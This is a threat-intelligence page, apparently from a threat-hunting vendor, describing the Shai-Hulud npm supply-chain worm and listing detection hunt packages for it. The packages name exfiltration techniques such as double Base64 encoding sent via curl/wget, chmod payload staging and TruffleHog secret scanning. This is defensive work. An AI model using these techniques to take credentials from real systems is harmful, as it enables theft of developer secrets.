Emerging Threats//
CrazyHunter Ransomware
CrazyHunter is a ransomware campaign targeting healthcare that weakens endpoint defenses and escalates privileges before encrypting systems at scale.
Threat Overview - NPM - Shai-Hulud Worm
The "Shai-Hulud" worm represents a significant escalation in software supply chain attacks, particularly within the Node.js ecosystem. Discovered in mid-September 2025, this self-replicating malware has compromised over 500 npm packages, including widely used libraries such as @ctrl/tinycolor and several maintained by CrowdStrike. This worm's primary objective is to harvest developer credentials, such as GitHub Personal Access Tokens (PATs), npm tokens, and cloud service API keys, and exfiltrate them to attacker-controlled endpoints. Additionally, stolen credentials have been observed to be uploaded to public GitHub repositories named "Shai-Hulud," making them accessible to the public.
The impact of this attack is significant, as it not only compromises individual developer environments but also exposes private repositories and organizational secrets, potentially leading to further exploitation.
Get your FREE Community Account today on the HUNTER Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!
NPM - Shai-Hulud Worm Hunt Collection
Related Hunt Packages
Base64 Encoding With Potential Exfiltration
This hunt package identifies shell commands where environment variables or content are double Base64 encoded and sent via curl/wget, potentially indicating exfiltration of sensitive data.
Usage Of Chmod To Enable Execution - Potential Payload Staging
This hunt package identifies instances where the 'chmod' command is used to modify file permissions, specifically focusing on changes that grant executable rights. By correlating these events with user contexts and known file paths, the package aims to highlight potentially malicious activities, such as the preparation of a system for exploitation or the setup of persistence mechanisms by unauthorized users.
Unusual Secret Scanning Processes - Trufflehog Activity
This hunt package aims to identify TruffleHog execution and associated secret-scanning behavior on endpoints, including suspicious file creation and repository access. The goal is to identify unauthorized credential discovery or secret exfiltration attempts in both developer and production environments.
Suspicious Dns Request - Github Api
This hunt detects unexpected DNS requests to api.github.com originating from developer endpoints. Such activity may indicate unauthorized secret scanning, repository modification, or credential exfiltration attempts. The hunt focuses on identifying abnormal API interactions that deviate from normal developer workflows, helping to detect potential misuse of tools like TruffleHog or other automated repository scanning utilities.
Double Base64 Encoding
This hunt package identifies the use of consecutive Base64 encoding operations (e.g., base64 | base64) which may indicate attempts to obfuscate or exfiltrate data.